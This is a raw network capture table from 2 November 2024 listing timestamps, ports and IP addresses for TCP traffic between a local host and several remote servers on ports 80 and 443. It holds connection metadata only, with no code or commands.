Nov 2, 2024 17:56:57.540769100 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.540780067 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.540824890 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.601887941 CET	443	49993	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.601917028 CET	443	49993	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.601980925 CET	443	49993	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.601984978 CET	49993	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.602022886 CET	49993	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.602286100 CET	49993	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.602318048 CET	443	49993	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.602332115 CET	49993	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.602338076 CET	443	49993	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.617028952 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.617052078 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.617063999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.617075920 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.617120028 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.617177010 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.618669987 CET	49997	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.618757963 CET	443	49997	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.618849039 CET	49997	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.619004011 CET	49997	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.619021893 CET	443	49997	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.625165939 CET	443	49994	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.625619888 CET	49994	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.625643015 CET	443	49994	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.626092911 CET	49994	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.626100063 CET	443	49994	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.642602921 CET	443	49992	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.642669916 CET	443	49992	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.642725945 CET	443	49992	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.642792940 CET	49992	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.643064976 CET	49992	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.643079042 CET	443	49992	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.643089056 CET	49992	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.643100023 CET	443	49992	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.646488905 CET	49998	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.646521091 CET	443	49998	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.646683931 CET	49998	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.646895885 CET	49998	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.646907091 CET	443	49998	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.650490999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650522947 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650535107 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650552988 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.650578022 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.650645971 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650659084 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650698900 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650749922 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.650763035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650775909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650820017 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.650850058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650862932 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650875092 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650907993 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.650918961 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.650939941 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650950909 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.650990009 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.651022911 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.651041031 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.651067972 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.651093960 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.651125908 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.651139975 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.651171923 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.651181936 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.651215076 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.651226044 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.651236057 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.651263952 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.651287079 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.651319027 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.651330948 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.651398897 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.651448011 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.657622099 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.657668114 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.657680035 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.657691002 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.657699108 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.657721043 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.657727957 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.657743931 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.657785892 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.657809973 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.657821894 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.657862902 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658040047 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658092022 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658119917 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658144951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658155918 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658174992 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658200979 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658225060 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658279896 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658291101 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658308983 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658341885 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658348083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658358097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658404112 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658416986 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658447027 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658459902 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658545017 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658556938 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658570051 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658616066 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658673048 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658683062 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658708096 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658721924 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658721924 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658760071 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658786058 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658838987 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658866882 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658879042 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658890963 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658904076 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.658926964 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.658945084 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659029007 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659070969 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659079075 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659081936 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659121990 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659151077 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659162998 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659198046 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659252882 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659265041 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659276962 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659300089 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659372091 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659384966 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659405947 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659416914 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659461975 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659476042 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659503937 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659527063 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659533024 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659564018 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659569025 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659574032 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.659600019 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.659610033 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.688946962 CET	443	49995	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.690959930 CET	49995	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.690983057 CET	443	49995	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.691553116 CET	49995	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.691557884 CET	443	49995	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.707968950 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:57.708996058 CET	49989	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:57.709048033 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:57.710150003 CET	49989	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:57.710158110 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:57.710191965 CET	49989	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:57.710220098 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:57.714056015 CET	443	49990	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:57.718627930 CET	49990	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:57.718660116 CET	443	49990	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:57.736195087 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.736244917 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.736294985 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.736356020 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.736372948 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.736421108 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.747349024 CET	49990	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:57.747359991 CET	443	49990	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:57.747606993 CET	49990	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:57.747617006 CET	443	49990	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:57.769803047 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.769824982 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.769838095 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.769897938 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.769906998 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.769906998 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.769911051 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.769990921 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770030975 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770030975 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770049095 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770056009 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770062923 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770093918 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770107985 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770140886 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770153999 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770203114 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770258904 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770271063 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770307064 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770351887 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770365953 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770379066 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770390987 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770400047 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770423889 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770482063 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770493984 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770507097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770546913 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770615101 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770654917 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.770656109 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770668983 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.770706892 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.775301933 CET	443	49994	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.775437117 CET	443	49994	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.775484085 CET	443	49994	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.775540113 CET	49994	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.776361942 CET	49994	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.776374102 CET	443	49994	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.776607990 CET	49994	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.776612997 CET	443	49994	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.777321100 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777369976 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777379036 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777384043 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777426004 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777589083 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777687073 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777692080 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777698994 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777714014 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777726889 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777740002 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777741909 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777741909 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777762890 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777772903 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777786016 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777837038 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777837038 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777837038 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777864933 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777875900 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777896881 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777908087 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.777954102 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777954102 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.777966976 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778013945 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778067112 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.778131008 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778142929 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778156996 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778187990 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.778212070 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.778284073 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778295994 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778317928 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778328896 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778342962 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.778354883 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.778374910 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.778404951 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778453112 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778464079 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778498888 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.778498888 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.778512001 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778525114 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:57.778561115 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.778740883 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.823307991 CET	443	49995	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.823391914 CET	443	49995	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.823551893 CET	49995	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.829248905 CET	49999	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.829313993 CET	443	49999	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.829384089 CET	49999	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.829638004 CET	49995	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.829660892 CET	443	49995	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.829684973 CET	49995	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.829693079 CET	443	49995	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.830416918 CET	49999	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.830437899 CET	443	49999	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.839644909 CET	50000	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.839682102 CET	443	50000	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.839801073 CET	50000	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.839988947 CET	50000	443	192.168.2.7	13.107.246.45
Nov 2, 2024 17:56:57.840003967 CET	443	50000	13.107.246.45	192.168.2.7
Nov 2, 2024 17:56:57.906112909 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:57.910974979 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.035712004 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:58.035738945 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:58.035824060 CET	49989	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:58.035859108 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:58.044713020 CET	49989	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:58.044737101 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:58.044758081 CET	49989	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:58.044936895 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:58.044975996 CET	443	49989	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:58.045031071 CET	49989	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:58.072484016 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.072536945 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.072694063 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.072915077 CET	50001	443	192.168.2.7	23.55.178.204
Nov 2, 2024 17:56:58.072930098 CET	443	50001	23.55.178.204	192.168.2.7
Nov 2, 2024 17:56:58.088419914 CET	50002	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:58.088494062 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:58.088565111 CET	50002	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:58.088777065 CET	50002	443	192.168.2.7	20.190.159.4
Nov 2, 2024 17:56:58.088795900 CET	443	50002	20.190.159.4	192.168.2.7
Nov 2, 2024 17:56:58.173921108 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.173980951 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.173983097 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.173998117 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174030066 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174046993 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174069881 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174114943 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174173117 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174187899 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174201012 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174213886 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174216032 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174242020 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174293041 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174357891 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174370050 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174398899 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174405098 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174415112 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174463987 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174474955 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174489975 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174501896 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174520016 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174546957 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174570084 CET	49933	80	192.168.2.7	62.204.41.163
Nov 2, 2024 17:56:58.174683094 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174695969 CET	80	49933	62.204.41.163	192.168.2.7
Nov 2, 2024 17:56:58.174707890 CET	80	49933	62.204.41.163	192.168.2.7
